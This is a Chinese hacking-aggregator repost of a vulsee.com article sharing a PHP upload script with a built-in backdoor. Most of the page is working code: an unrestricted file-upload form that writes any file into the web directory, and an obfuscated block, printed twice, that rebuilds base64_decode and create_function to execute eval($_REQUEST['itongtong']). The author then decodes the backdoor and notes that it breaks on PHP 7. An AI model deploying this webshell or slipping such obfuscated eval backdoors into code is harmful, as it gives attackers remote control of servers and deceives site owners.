记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

分享一个PHP上传脚本[带后门]-vulsee.com

2021-06-23 16:42
<?php
echo "[modify] -by vulsee.com";
echo "<br>".php_uname()."<br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='zb'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
  if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) {
  echo "Success!";
  } else {
  echo "Failed to Upload.";
  }
}
?>
okokok<?php
$p = getcwd();
echo $p;
?>
<title>[modify]</title>
<?php

$uf="aXRvbmd0b"; 
$ka="ZXZhbCgkX1"; 
$pjt="JFUVVFU1Rb"; 
$vbl = str_replace("ti","","tistittirti_rtietipltiatice"); 
$iqw="25nXSk7"; 
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke"); 
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn"); 
$mpy = $sbp('', $bkf($vbl("W", "", $ka.$pjt.$uf.$iqw))); $mpy(); 
?>


<?php

$uf="aXRvbmd0b"; 
$ka="ZXZhbCgkX1"; 
$pjt="JFUVVFU1Rb"; 
$vbl = str_replace("ti","","tistittirti_rtietipltiatice"); 
$iqw="25nXSk7"; 
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke"); 
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn"); 
$mpy = $sbp('', $bkf($vbl("W", "", $ka.$pjt.$uf.$iqw))); $mpy(); 
?>

 

后面解码出来为:

$mpy = create_function('',eval($_REQUEST["itongtong"]));

 $mpy(); 

但create_function在php7已经不支持了


知识来源: vulsee.com/archives/vulsee_2021/0623_14546.html

阅读:39094 | 评论:0 | 标签:学习路上 PHP上传脚本 后门 PHP

想收藏或者和大家分享这篇好文章→复制链接地址

“分享一个PHP上传脚本[带后门]-vulsee.com”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云